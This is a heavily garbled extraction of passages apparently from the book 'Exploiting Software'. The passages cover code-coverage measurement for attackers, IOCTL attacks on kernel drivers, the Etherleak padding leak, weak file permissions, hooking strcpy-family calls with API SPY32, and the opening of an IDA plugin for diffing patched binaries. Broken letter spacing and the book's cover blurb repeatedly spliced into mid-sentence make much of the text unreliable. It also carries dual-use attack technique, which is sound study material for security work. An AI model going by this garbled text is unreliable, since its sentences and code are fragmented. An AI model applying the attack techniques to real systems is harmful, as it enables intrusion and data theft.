Making ofk Code WhenUse net w or secur it y Coverage m ech anisms do n ot w or k Cr ackin At tgack a comp pat t er utns er syst em is a scient if ic pr ocess ju st as m uch as it is an ar t . I n f act , w ield in g t he scient if ic m et h od gives t h e at t ack er an u pper han d in an ot her w ise arb it rar y er se engineer in hod g gam e.Rev The scient ific m et st ar t s w it h measur ement . Wit hout t h e abilit y t o m easur e y our env iron ment , how can y ou p ossibly d raw conclu sion s about it ? Most of t he appr oaches w e Classic at t acks ageainst serv ert osoft w ar consider in t his t ext ar designed f ind preogr am min g f law s. Usually ( not alw ays) , t he bu gs w e f in d t his w ay ar e confin ed t o sm all r egions of code. I n ot her w or ds, it ' s usually t h e small Sur t acks clien soft coding mpr istising ak es at t hat w eag arainst e af t er . Tht is is war oneer eason t h at n ew developm ent t ools are ver y likely t o ham per m any of t h e t r adit ional m et hod s of at t ack . I t 's easy for a dev elop ment t ool Tech niqu es f or cr aft ing m aliciou s inpu t t o id en t ify a sim p le pr ogr amm ing er ror ( st at ically ) an d com pile it ou t . I n a f ew year s, buf fer ov er f low e obsolet e as at t ack et hsod. Thes t will echnbical det ails of ban uf fer ov erm f low All t h e t ech w e d escrib e ar e a f orm of measur ement . We obser ve t he behav ior of t h e Root k itniques s pr ogr am w h ile it is exer cised in som e w ay ( for ex am ple, placed u nder st r ess) . St r ang e behav icat u nstwit able Unst able h asknaow h igh y of rit y Ex p lo iior t inusually g S o ft wind a re is es f illed h t hcode. e t ools, con ceptcode s, and ledgpreobabilit necessar y tsecu o b reak w eakn esses. Measur em en t is t h e key . soft w ar e. Cod e cov er age is an im por t ant t yp e of m easur em en t —per haps t he m ost im por t ant . Code cover age is a w ay of w at ching a p rog ram ex ecut e and d et er m in ing w hich code p at hs h ave been ex ercised . Many t ools are available f or code cov er age analysis. Cod e cov er age t ools do not alw ays requ ir e sour ce code. Som e t ools can at t ach t o a p r ocess and gat h er m easu rem en t s in real t im e. For one ex am ple, check ou t t he Univer sit y of Mar yland 's t ool dy ninst API ( cr eat ed b y Jeff Hollin gsw ort h) . [ 7] [ 7]

The dyninstAPI tool can be foun d at http: / / w w w .dyninst.or g/ .

As an at t ack er , code cov erag e t ells you how mu ch w or k is left t o d o w hen y ou'r e sur v ey ing t he lan dscape. By using cover age an aly sis y ou can imm ediat ely lear n w hat you h ave m issed . Com pu t er pr ogr am s ar e comp lex , and cr ack ing t h em is t ed ious bu sin ess. I t 's hum an nat u re t o sk ip par t s of t he cod e and t ak e shor t cut s. Cod e cov er age can sh ow y ou w h et h er you hav e m issed som et hing . I f you sk ip ped t hat su br out ine b ecause it looked har m less, w ell t hink again! Cod e cover age can help y ou go back and check you r w ork , w alk ing dow n t hose dar k alley s y ou m issed t h e fir st t im e. •

Table of Content s

ing t o cr ack sof t w ar e, you m ost likely st ar t w it h t he user in put point . As an •I f you ar e t r yI ndex [ 8] Using out side- in t racing , y ou can m easur e t h e code exam consider a call WSARecv(). Expl oitple, ing Softw a re How to Brt eoak Code pat h s t hat ar e v isit ed. Many decision s are mad e by t he code af t er user input is accep t ed . By Gr eg Hoglund , Gar y McGr aw These decisions are im plem en t ed as br anching st at ement s, su ch as t h e condit ional br anch st at ement s JNZ an d JE, in x8 6 m achine cod e. A code cov er age t ool can det ect w hen a br anch Pub lish er: Addison Wesley is abou t t o occu r and can build a m ap of each cont inu ous block of m achine code. Wh at t h is Pub Dat e: February 17, 200 4 m ean s is t hat y ou, as t he at t ack er , can inst ant ly d et er m ine w hich cod e pat h s y ou h ave not I SBN:dur 0- 20 1- 786 95 -8analy sis. exer cised ing y our Pages: 51 2 [ 8]

The WSARecv function r eceiv es data fr om a connected sock et. See http: / / m sdn.m icrosoft .com/ libr ar y/ default.asp?ur l= / libr ar y / en- us/ w insock / winsock/ w sar ecv_2.asp.

Rev er se engineer s kn ow t h at t h eir w or k is long and t ediou s. Using code cover age g ives t h e clev er r ev erse eng in eer a m ap f or t r ackin g p rog r ess. Such t r ack ing can keep y ou sane and How d oeskeep sof t w aregoing br eakw? hen Howy ou do ot at ht acker sm p ur can also y ou er w ise make ig ht sof givt w e ar upe wbriteak houtonexp lorpose? ing allWhy are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? opp ort unit ies. What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Cod e cov er age is such an im por t an t t ool for y our bag of t r ick s t hat lat er in t he chap t er we Ex p lo i t in g S oyftou w acan re isb uild loaded w it hcov ex amp lest ool of rfreal t ack er ns,let ools, an d on illust rat e how a code er age omatscr at s, ch.atI tnack ourpat extamp w e focus tt he echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e x8 6 assemb ly lan guag e and t he Window s XP OS. Ou r exp er ience lead s us t o believfreom t h at at twack st fir st lear n h ow eal ect at t acks really t . ex act n eeds. Many of t he it ill b, ey ou harmd ufor y ou t o f ind t he rperf cod eare cover age carr t oolied forou y our av ailab le t ools, com m ercial or ot herw ise, lack at t ack - st y le feat ur es and dat a v isu alizat ion This m ustt-hat h ave m ay y ou—and m et hods ar ebook im por t anshock t t o t he at t ack er.it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t wthe ar e ex ploit w ill Accessing Kernel

con t inue t o be a ser ious p r oblem

When net w or k secur it y m ech anisms do n ot w or k Poor access cont r ols on han dles opened by dr iv er s can ex pose a syst em t o at t ack. I f y ou find a d ev ice dr iver w it h an unp r ot ect ed hand le, y ou m ight be ab le t o r un IOCTL com m ands t o t h e At t ack pat t er ns k er nel d r iv er. Depending on w hat t he d r iv er supp ort s, you m ight be ab le t o cr ash t h e m achine g ain accessintgo t he ker nel. Any inp ut t o t h e dr iver t hat in clud es mem or y add resses Rev or er se engineer should be im m ediat ely t est ed by insert in g NULL v alues. Anot h er opt ion is t o in ser t ad dr esses t hat m ap t o kat ern el mem or y. serv I f t he iv er 't perf or m sanit y checking on t he user - m odeClassic t acks ag ainst er dr soft w ardoesn e supp lied v alu es, k ern el m em or y m ay get malf orm ed. I f t h e at t ack is v er y clever , global st at e in t heSur k ern may m odif ied, alt er ing access pr el ising at tbe acks ag ainst clien t soft war e per m issions. Tech niqu es f or cr aft ing m aliciou s inpu t

Leaking Data Buffers The t echn ical in detShared ails of b uf fer ov er f low s Shar ing Root buk ff it er s s is som ew h at lik e shar in g food. A r est au ran t ( h opefu lly ) m aint ain s st r ict ru les abou t w her e r aw m eat can be p laced. A lit t le r aw ju ice in som eon e' s cooked m eal cou ld lead lo i t in and g S oaftlaw w asuit re is. fAilled wit hprt hogr e tam ools,has conmcept and kn Pr owogr ledg e snecessar t o b reak tEx o p illness t y pical any s,b uff ers. am t end t o yreuse the soft e. fer s ov er and over , bu t t h e qu est ions f r om our p er spect ive ar e t he follow ing : Will samwear buf t hey b e cleaned? Ar e dir t y dat a k ep t f rom clean dat a? Buff ers are a gr eat p lace t o st ar t look in g f or p ot en t ial dat a leak age. An y buf fer t h at is u sed for bot h pub lic and pr ivat e dat a has a pot ent ial t o leak inf orm at ion. At t ack s t hat cause st at e corr up t ion and/ or r ace condit ion s m ay be u sed t o cause p riv at e dat a t o leak int o pu blic dat a. Any use of a buf fer w it hou t cleaning t he d at a b et w een u ses leads t o pot ent ial leak s.

Example: The Ethernet Scrubbing Problem On e of us ( Hog lu nd) codiscov ered a v ulner abilit y a f ew y ear s ag o t h at af fect s pot ent ially m illions of et h er n et card s w orld wid e. [ 9] Et her net car ds u se st an dar d ch ip set s t o con nect t o t he net w ork . Th ese chips are t ru ly t he " t ir es" of t he I n t ern et . The pr ob lem is t hat m an y of t hese chips ar e leak in g d at a acr oss pack et s. • •

Table of Content This vu lner abilit y w as slater r eleased independently as t he " Etherleak v ulner ability." Go to http: / / arIchiv ndex es.neohapsis.com/ archives/ v ulnw atch/ 2003- q1/ 001 6.ht ml for m or e infor mation. [ 9]

Expl oit ing Softw a re How to Br e ak Code

The p r oblem ex ist s because dat a ar e st ored in a bu ffer on t h e et hern et m icr ochip. The By Gr eg Hoglund , Gar y McGr aw m inim um am oun t of d at a t h at m ust be sen t in an et hern et pack et is 66 by t es. This is t h e m inim um f ram e size. But , man y pack et s t hat need t o be t r ansm it t ed are act u ally m u ch Pub lisht er: Wesley sm aller h anAddison 6 6 b yt es. Exam ples include sm all p in g packet s an d ARP r equest s. Thus, t hese Pubpacket Dat e: February 200 4 w it h d at a t o m eet t he m inim um n um ber of 66 b yt es. sm all s ar e p17, added I SBN: 0- 20 1- 786 95 -8

The p rPages: oblem51?2 Many chip s do not clean t heir buf fer s bet w een pack et s. Thus, a small p acket w ill be p added w it h w h at ev er w as left in t h e bu ff er f r om t he last packet . This m ean s t hat ot her p eop le' s pack et s are leak ing int o a pot ent ial at t ack pack et . This at t ack is simp le t o exp loit and t h e at t ack w ork s ov er sw it ch ed env iron ment s. An at t ack can craf t a v olley of sm all packet s t hat solicit a sm all pack et as a r ep ly . As t he sm all r ep ly packet s ar r ive, t h e at t ack er look s at t he p addin g d at a t o see ot her people's p ack et d at a. How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir alls, ru sion ect iv ir us soft e np ot eepever in g yout t he Ofew cour se,int som e d atdet a ar e ion lostsyinsttem hiss,atand t ackant , b ecause t h ewar fir st artk of pack et bad is g uy s? What u sed t oimb at reak soft is book t he ov er w trools it t encan w it hbet he legit e d at a fwar or te? heTh reply . So,ptrov h e ides at t ack er answ w ill ner ats.ur ally w ant t o cr aft as sm all a p ack et as possible t o siphon t h e dat a st r eam . Ping pack et s w ork w ell f or t hese Ex p lo i t in gand S o ft w a rean is at loaded ex amp lest ex oft rpassw eal at tor ack at t ack t ert sns, ools, pt anion d pu rp oses, allow t ack erwtitohsnif f clear dss,and ev enpat par of tencry tkechniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om ey s. ARP packet s ar e ev en sm aller , bu t w ill n ot w or k as a rem ot e at t ack . Usin g ARP pack et s, at t ack , y ou m u stget fir st lear n h ow r eal carr in iedt he ou tresponse. . an at t acker can TCP ACK nu mb er satftracks om otare herreally sessions This aid s in a st andar d TCP/ I P hijack ing at t ack. [ 10] This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt [ 10] k idSee dieFir t rew eat m en m any ing you for w illmor learn t hij acking. alls an dt If nound t er n etin Secu r it y [hack Chesw ick book et al., s,2003] e on abou TCP/ IP Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem

Auditing for Access Requirement Screwups When net w or k secur it y m ech anisms do n ot w or k

Lack of p lan ning or laziness on t he p art of soft w ar e engineer s oft en lead s t o pr ogr ams t hat ack inist pat t er r eq uirAt e tadm r atns or or r oot access t o oper at e. [ 11] Many pr og ram s t h at w er e upg r aded f r om older Wind ow s en vir onm ent s t o w or k on Win2K and Window s XP usually r equir e fu ll access t o Rev er se engineer in g t he sy st em. This w ould be OK except t hat pr ogr am s t hat oper at e t his w ay t en d t o leav e a lot of w orClassic ld - accessib le files sit t inserv g arer oun d. w ar e at t acks ag ainst soft [ 11]

To lear n m or e about this comm on pr oblem and how to avoid it, see Bu ildin g Secu r e Soft w ar e [ Viega

Sur ising t acks and pr McGr aw , at 2001] . ag ainst clien t soft war e

f or wcrher afteing m aliciou s inpu Look Tech for d niqu ir ectes ories user dat a files arte being st ored. Ask y our self , ar e t h ese dir ect ories st or in g sensit ive dat a as w ell? I f so, is t h e dir ect or y p er m ission w eak ? Th is applies t o t he NT t echn det ailsoperat of b ufion fer sov r eg istThe r y an d t o ical dat abase aserwf low ell. sI f an at t ack er r ep laces a D LL or chang es t he set t in gs f or a pr ogr am, t he at t ack er m ight be ab le t o elev at e access an d t ake ov er a sy st em . Root k it s Under Wind ow s NT, look f or open calls t h at r equest or cr eat e r esour ces w it h n o access rEx estprlo icti tions. cessive r equ t s lead t o insecur f ile ect permy ission s. in g SEx o ft w a re isaccess f illed wit h irt hem e ten ools, con cept s, and ekn owand ledgobj e necessar t o b reak soft w ar e.

Using Your API Resources Man y sy st em calls ar e k now n t o lead t o pot ent ial v ulner abilit ies [ Viega and McGr aw , 20 01] . On e good m et h od of at t ack w hen r ever sin g is t o look f or k now n calls t h at ar e pr ob lem at ic ( includin g, f or exam ple, t h e m uch m align ed strcpy()) . For t un at ely , t h er e ar e t ools t h at can help. [ 12]

[ 12]

Cigital m aintains a database of st atic analy sis r ules per taining to secur ity . Ther e ar e mor e than 550 ent ries for C and C+ + alone. Stat ic analysis t ools use this infor mation to uncov er potential vu lner abilit ies in softw are (an approach that w or k s as w ell for softw ar e exploit as it does for softw are impr ov em ent) .

Figur e 3- 3 in clu des a screenshot t hat sh ow s API SPY32 cap t ur ing all calls t o strcpy on a t ar get sy st em . W e used t h e API SPY32 t ool t o cap t ur e a ser ies of lstrcpy calls f rom Micr osoft SQL ser v er. Not all calls t o strcpy ar e g oing t o b e vu lnerab le t o b uff er over flow , b ut som e w ill. •

Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code

Figu r e 3 - 3 . API SPY3 2 can be u se d t o f in d lstrcpy() cal ls i n t he SQL ser v er code . Thi s scr ee nshot show s t h e r esul t s of on e que r y.

By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4

[ View full size im age]

I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech f or tcr aliciou t API SPY is niqu v ery es easy o aft seting up.m You cans inpu dow nload t he pr ogr am f rom w w w .in t er nals. com. You m ust m ak e a sp ecial f ile called API Spy 32 .ap i and p lace it in t h e WI NNT or W I NDOWS echnt hical det ails of wb eufuse fer ov f low s ing con figu rat ion f ile set t ing s: dir ectThe or y . t For is ex am ple, t h er e follow Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

KERNEL32.DLL:lstrcpy(PSTR, PSTR) KERNEL32.DLL:lstrcpyA(PSTR, PSTR)

KERNEL32.DLL:lstrcat(PSTR, PSTR) KERNEL32.DLL:lstrcatA(PSTR, PSTR) WSOCK32.DLL:recv WS2_32.DLL:recv •

Table of Content s



I ndex

ADVAPI32.DLL:SetSecurityDescriptorDACL(DWORD, DWORD, DWORD, DWORD) Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

ThisPub set lish s er: API Addison SPY t Wesley o look for som e f unct ion calls t hat w e are in t er est ed in. While t est in g, it is ext rPub emDat elye:uFebruary sef ul t o17, hook 200 4p ot en t ially vu ln er able API calls, as w ell as an y calls t h at t ak e u ser inpu t . II SBN: n bet0-w20een t he 1- 786 95 -8t w o com es y our rev er se engin eer ing t ask . I f y ou can det er m in e t hat dat a frPages: om t he inp ut side r eaches t he v uln er able API call, y ou hav e fou nd you r self a w ay in. 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Writing Interactive Disassembler (IDA) Plugins I DA is sh ort for I n t er act iv e Disassemb ler ( available f r om w w w .d at ar escue. com ) and is one of t h pop ular r ev er se eng ineer ing t ools f or soft w ar e. I DA sup por t s plu gin m od ules so cust om er s can e t he fun ct ion alit y and aut om at e t ask s. For t his b ook w e cr eat ed a simp le I D A plu gin t hat can scan •t hr ou gh t w o Table of Content s com p are t hem. The plu gin will h ighligh t any cod e r eg ion s t hat hav e bin ary files and •chang ed . This I ndex can be u sed t o com par e a pr ep at ch ex ecut able w it h a post p at ch ex ecut ab le t o d et Expl oit ing Softw re How to eBrfeixak Code w hich lin es of acode wer ed. By Gr eg Hoglund , Gar y McGr aw

I n man y cases, soft w ar e v en dor s w ill " secr et ly" fix secu rit y bug s. The t ool w e p r ovide here can h at t ack er find t hese secr et pat ch es. Be f or ew ar ned t hat t his p lu gin can f lag m an y locat ion s t hat h Pub lish er: Addison Wesley chang ed at all. I f com piler opt ions are ch anged or t he padd in g bet w een fun ct ion s is alt ered, t he Dat e: February 17, 200 4 w ill Pub r et u r n a nice set of false posit iv es. Nonet h eless, t his is a g r eat exam ple t o illu st rat e how t o s I 20 1-ins. 786 95 -8 w r it in g SBN: I D A 0-plug Pages: 51 2

Ou r ex am ple also em phasizes t he biggest p rob lem wit h penet r at e- and - pat ch secur it y. Pat ches a at t ack m aps, an d clever at t ack ers k now how t o r ead t h em . To use t h is cod e y ou w ill n eed t he I D soft w ar e dev elop ment k it ( SDK) , w hich is av ailable along w it h t he I DA pr oduct . Code is com m en inline. These ar e st andar d header f iles. Depend in g on w h ich API calls you int end t o use, y ou m a tHow o in clu de sof ot hter h ead files. Notdo e tat hat w e hav disabled ain w m essage an d in clud e d oes w are brer eak ? How t acker s meake sof t w ara ecer brteak onarpning ur pose? Why are Wind ows header file as w ell. By doin g t h is w e ar e able t o use Wind ows gr aphical u ser fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad gint uyers?face ( code f or pop up dialogs an d so on. Th e w arn in g 427 3 is t hr own w hen y ou u se t he st and ard t em p What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. libr ar y and it 's cu st om ar y t o disable it . Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem #include When net w or k secur it y m ech anisms do n ot w or k #pragma warning( disable:4273 ) At t ack pat t er ns #include Rev er se engineer in g #include Classic at t acks ag ainst serv er soft w ar e #include Sur pr ising at t acks ag ainst clien t soft war e #include

Tech niqu es f or cr aft ing m aliciou s inpu t #include

The t echn ical det ails of b uf fer ov er f low s Root k it s #include Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. Becau se our plu gin is based on a sam ple p lu gin su pplied wit h t h e SDK, t h e follow ing code is m er of t he sam ple. Th ese ar e r eq uir ed f unct ions an d t he com m en t s w er e alr eady par t of t he sam ple.

//-------------------------------------------------------------------------// This callback is called for UI notification events. • of Content s static int Table sample_callback(void * /*user_data*/, int event_id, va_list /*va*/) •

I ndex

Expl oit ing {

Softw a re How to Br e ak Code

By Gr eg Hoglund , Gar y McGr aw

if ( event_id != ui_msg )

// Avoid recursion.

Pub lish er: Addison Wesley

if ( event_id != ui_setstate Pub Dat e: February 17, 200 4

0- 20 1- 786 && I SBN: event_id ! 95=-8ui_showauto Pages: 51 2

&& event_id ! = ui_refreshmarked ) // Ignore uninteresting events msg("ui_callback %d\n", event_id); return //How 0 means "process How d oes0; sof t w are br eak ? do at t acker s m akethe sof tevent"; w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? otherwise, What t ools can be u sed t o// b reak soft war e?the Th isevent book pwould rov idesbe t heignored. answ er s. } Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om //-------------------------------------------------------------------------at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . ThisAmsample ust - h aveofbook ay generate shock y ou—and it will cer t ainly e y ou. Get t ing bey ond t he // howmto user-defined line educat prefixes scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t static const int prefix_width = 8; Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k static void get_user_defined_prefix(ea_t ea, At t ack pat t er ns

int lnnum,

Rev er se engineer in g int indent, Classic at t acks ag ainst serv er soft w ar e const char *line, Sur pr ising at t acks ag ainst clien t soft war e char *buf, Tech niqu es f or cr aft ing m aliciou s inpu t size_t bufsize) The t echn ical det ails of b uf fer ov er f low s {

Root k it s

buf[0] = '\0'; // Empty prefix by default Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. // We want to display the prefix only on the lines which // contain the instruction itself.

if ( indent != -1 ) return;

// A directive

if ( line[0] == '\0' ) return;

// Empty line

if ( *line == COLOR_ON ) line += 2; if ( *line == ash.cmnt[0] ) return; • •

// Comment line. . .

Table of Content s I ndex // We don't want the prefix to be printed again for other lines of the

Expl oit ing Softw a re How to Br e ak Code By// Gr eg Hoglund , Gar y McGr aw same instruction/data.

For that we remember the line number

//Pub and compare it before generating the prefix. lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

static ea_t old_ea = BADADDR; static int old_lnnum; if ( old_ea == ea && old_lnnum == lnnum ) return; How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. // Let's display the size of the current item as the user-defined prefix. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by =bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om ulong our_size get_item_size(ea); at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . // Seems to be an instruction line. We don't bother with the width This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr k id die t r it eat m en t f be ound in m any hackspaces ing bookby s, you ill learn abou t //iptbecause will padded with the wkernel. Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem snprintf(buf, " ech %d", our_size); When net w orbufsize, k secur it y m anisms do n ot w or k // Remember At t ack pat tthe er nsaddress and line number we produced the line prefix for. old_ea = se ea; Rev er engineer in g Classic at ag ainst serv er soft w ar e old_lnnum = t acks lnnum; Sur pr ising at t acks ag ainst clien t soft war e }

Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s

Root k it s //-------------------------------------------------------------------------Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak // w ar e. soft //

Initialize.

// //

IDA will call this function only once.

//

If this function returns PLGUIN_SKIP, IDA will never load it again.

//

If this function returns PLUGIN_OK, IDA will unload the plugin but

//

remember that the plugin agreed to work with the database.

//

The plugin will be loaded again if the user invokes it by

//

pressing the hot key or by selecting it from the menu.



Table of Content s

// •

After I ndex the second load, the plugin will stay in memory.

Expl oit ing Softw a re How to Br e ak Code

//

If this function returns PLUGIN_KEEP, IDA will keep the plugin

By Gr eg Hoglund , Gar y McGr aw

//

in memory. In this case the initialization function can hook Pub lish er: Addison Wesley

//

the processor Pubinto Dat e: February 17, 200 4

module and user interface notification points.

I SBN: 0- 20 1- 786 95 -8

//

See the hook_to_notification_point() function.

Pages: 51 2

// //

In this example we check the input file format and make the decision.

How oes sof t w or are may br eaknot ? How do atany t acker s m ake sof t w ar e brto eakdecide on p ur pose? Why do, are // dYou may check other conditions what you fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What twhether ools can be t o b to reakwork soft war e? Th is book p rov ides t he answ er s. // youu sed agree with the database. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d // t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . int init(void) This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he { scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t if ( inf.filetype == f_ELF ) return PLUGIN_SKIP; Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k // Please uncomment the following line to see how the notification works: At t ack pat t er ns // hook_to_notification_point(HT_UI, sample_callback, NULL); Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e // Please uncomment the following line to see how the user-defined prefix works: Sur pr ising at t acks ag ainst clien t soft war e // set_user_defined_prefix(prefix_width, get_user_defined_prefix); Tech niqu es f or cr aft ing m aliciou s inpu t return The tPLUGIN_KEEP; echn ical det ails of b uf fer ov er f low s }

Root k it s

Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. //-------------------------------------------------------------------------//

Terminate.

//

Usually this callback is empty.

//

The plugin should unhook from the notification lists if

//

hook_to_notification_point() was used.

// //

IDA will call this function when the user asks to exit.

//

This function won't be called in the case of emergency exits.



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code

void term(void)

By Gr eg Hoglund , Gar y McGr aw

{ Pub lish er: Addison Wesley

unhook_from_notification_point(HT_UI, sample_callback); Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8

set_user_defined_prefix(0, NULL); Pages: 51 2

}

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ru sion det ectand ion som sy st eem s, andvar ant iv ir usarsoft war e n othere: k eep in g out t he bad g uy s? A few ewalls, m orint e header files global iables e included What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t #include

Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem #include When "resource.h" net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns er se engineer in g = 0; DWORDRev g_tempest_state Classic at t acks ag ainst serv er soft w ar e LPVOID g_mapped_file = NULL; pr ising at t acks DWORDSur g_file_size = ag 0;ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s This fRoot unct ion k it s loads a file int o m em or y . This f ile is going t o b e used as t he t ar get t o com par e our binar y ag ainst . Ty pically y ou w ould load t h e un pat ched file int o I D A and com par e it w it h t he pat file: Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

bool load_file( char *theFilename ) { HANDLE aFileH = CreateFile( •

Table of Content s



I ndex

theFilename,

Expl oit ing Softw a re How to Br e ak Code

GENERIC_READ, 0,

By Gr eg Hoglund , Gar y McGr aw

NULL, Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4

OPEN_EXISTING,

I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

FILE_ATTRIBUTE_NORMAL, NULL);

